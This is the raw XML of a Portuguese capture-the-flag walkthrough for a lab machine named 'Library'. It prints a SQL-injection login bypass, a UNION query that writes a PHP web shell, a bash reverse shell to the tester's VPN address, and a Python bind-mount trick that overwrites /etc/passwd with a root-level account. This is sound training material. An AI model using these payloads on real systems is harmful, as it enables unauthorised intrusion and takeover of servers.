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30j0zll" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introdução</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Este write-up é referente a máquina </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Library</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Caso precise de suporte, favor abrir um ticket no </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">canal de suporte no servidor do Discord</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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1fob9te" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconhecimento</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Primeiramente, é necessário descobrir os serviços em execução e identificar as portas acessíveis. Para realizar essa tarefa, empregaremos o Nmap, uma ferramenta especializada em mapeamento de redes e análise de serviços.</w:t>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nmap -p- -sCV -Pn 172.16.15.140 --min-rate 300</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986776" cy="2233660"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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86776" cy="223366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a conclusão da execução da ferramenta, identificamos a abertura de apenas uma porta web, a 80.</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675709" cy="1717405"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="24" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="10108" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4675709" cy="171740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várias tentativas de login utilizando credenciais padrão, como admin:admin, guest:guest e etc, sem sucesso, ao realizar um bypass utilizando uma payload de SQLi "admin' or 1=1-- -", conseguimos nos autenticar na aplicação.</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360402"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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572000" cy="13604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Observamos que se trata de uma livraria online, onde é possível comprar livros. Uma característica intrigante é a presença de um campo de pesquisa que podemos utilizar para procurar por livros. Diante disso, a primeira consideração que vem à mente é a possibilidade de injeção de SQL, especialmente após contornarmos a tela de login. A primeira tarefa consiste em identificar a quantidade de colunas.</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Rapidamente conseguimos descobrir que tem 5 colunas, e a coluna 2 foi refletida:</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264945"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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572000" cy="226494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Podemos obter a versão do banco de dados:</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301301"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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572000" cy="230130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a confirmação da injeção de SQL, o próximo passo é adquirir uma shell. Para alcançar isso, é necessário determinar se possuímos permissões de escrita no diretório raiz da aplicação (document root) ou em outro diretório. Após tentativas infrutíferas de escrever uma web shell no diretório raiz da aplicação, decidimos realizar um processo de fuzzing, identificando o diretório "assets". Ao escrever uma web shell nesse diretório, obtivemos êxito.</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023443"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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72000" cy="20234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'union select 1,"&lt;?php system($GET[0]);?&gt;",3,4,5 INTO outfile "/var/www/html/assets/wshell.php"--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353644"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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72000" cy="135364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É possível observar que o webshell foi disponibilizado no servidor.</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9">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730180"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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72000" cy="17301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Ao passar o comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">na URL é observado que o servidor apresenta o resultado do comando.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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487077"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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572000" cy="14870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obtermos RCE no servidor, o próximo passo consiste em adquirirmos uma reverse shell. Para isso, podemos empregar a seguinte payload. No entanto, é crucial lembrar de realizar a codificação em </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URL encode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> antes da utilização (substituir o &lt;IP_VPN&gt; pelo seu IP na VPN).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/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP_VPN&gt;/4444 0&gt;&amp;1' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Ouvinte do netcat para receber a conexão:</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nc -lvnp 4444</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8">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339178"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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572000" cy="13391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 encodada:</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C">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203947"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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572000" cy="12039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295975"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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572000" cy="12959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enviarmos a payload, recebemos a shell:</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574341"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="35" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="54662" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="57434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Para melhor gerenciamento do terminal, é realizado o upgrade para </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">full tty:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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1111280"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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572000" cy="11112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Acessando o diretório raiz conseguimos obter a primeira flag:</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4572000" cy="2717051"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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572000" cy="271705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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.aigjpet5l494" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalação de privilégios</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pegarmos a nossa primeira flag de usuário, é hora de escalarmos privilégios para obtermos a nossa última flag, para isso teremos que escalar para o usuário root.</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um comando é possível enumerar as </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">capabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">habilitadas.</w:t>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jc w:val="both"/>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getcap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2&gt;/dev/null</w:t>
      </w:r>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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Com isso, podemos identificar que o Python possui a capacidade (capability) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capsysadmin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3416270" cy="793780"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="39" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="40541" l="0" r="44583" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3416270" cy="7937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Conforme o artigo “</w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Exploiting Linux Capabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”, conseguimos estabelecer um novo usuário com as mesmas capacidades do usuário root, manipulando o arquivo passwd.</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Podemos começar gerando uma nova senha com o OpenSSL:</w:t>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passwd -1 password</w:t>
      </w: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3220700" cy="658779"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="40" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="63088" l="0" r="59124" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3220700" cy="6587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seguir, copiamos o arquivo passwd para o diretório /tmp e, posteriormente, adicionaremos um novo usuário com as mesmas capacidades do usuário root, utilizando a senha previamente definida.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cp /etc/passwd .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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printf 'pretty:$1$dFo2Prg5$pLfaDs2OJd0toE787NT0w.:0:0:root/root:/bin/bash\n' &gt;&gt; passwd</w:t>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5698491" cy="671018"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="41" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="54508" l="0" r="12241" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5698491" cy="67101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4">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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="3810000" cy="2591527"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="42" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="14489" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="259152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Através do exploit abaixo, conseguimos montar nosso arquivo passwd. </w:t>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libc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CDLL(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"libc.so.6"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libc.mount.argtypes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c_ulong,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c_char_p)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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MS_BIND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defined in /usr/include/sys/mount.h:55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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/home/student/passwd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/etc/passwd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filesystemtype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none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mountflags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MS_BIND</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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libc.mount(source,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filesystemtype,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mountflags,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Uma vez concluído esse processo, é simplesmente necessário autenticar-se com o nosso novo usuário utilizando a senha 'password'. Com isso, teremos acesso à última flag localizada no diretório /root.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114300" distR="114300">
            <wp:extent cx="4572000" cy="846375"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="43" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="41922" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="8463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 Todos os direitos reservados </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                          Página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7">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3znysh7"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-866773</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="30" name="image15.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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8">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color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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842519685038pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="37" name="image10.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image10.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5773420</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="21"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Library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5773420</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="2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67500" cy="2996629"/>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1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1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thehacker.recipes/infra/privilege-escalation/unix/capabilities" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tbhaxor.com/exploiting-linux-capabilities-part-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app.hackingclub.com/training/training-machines/153"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0.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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hyperlink" Target="https://urlencod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DmRsyBsoXRkUynhmCyjQGTAQ==">CgMxLjAyCGguZ2pkZ3hzMgloLjMwajB6bGwyCWguMWZvYjl0ZTIOaC5haWdqcGV0NWw0OTQyCWguM3pueXNoNzgAciExNTdkWVFXYWxBX1I4REF5WFRLUi11OUFERU1WZ0RGM2w=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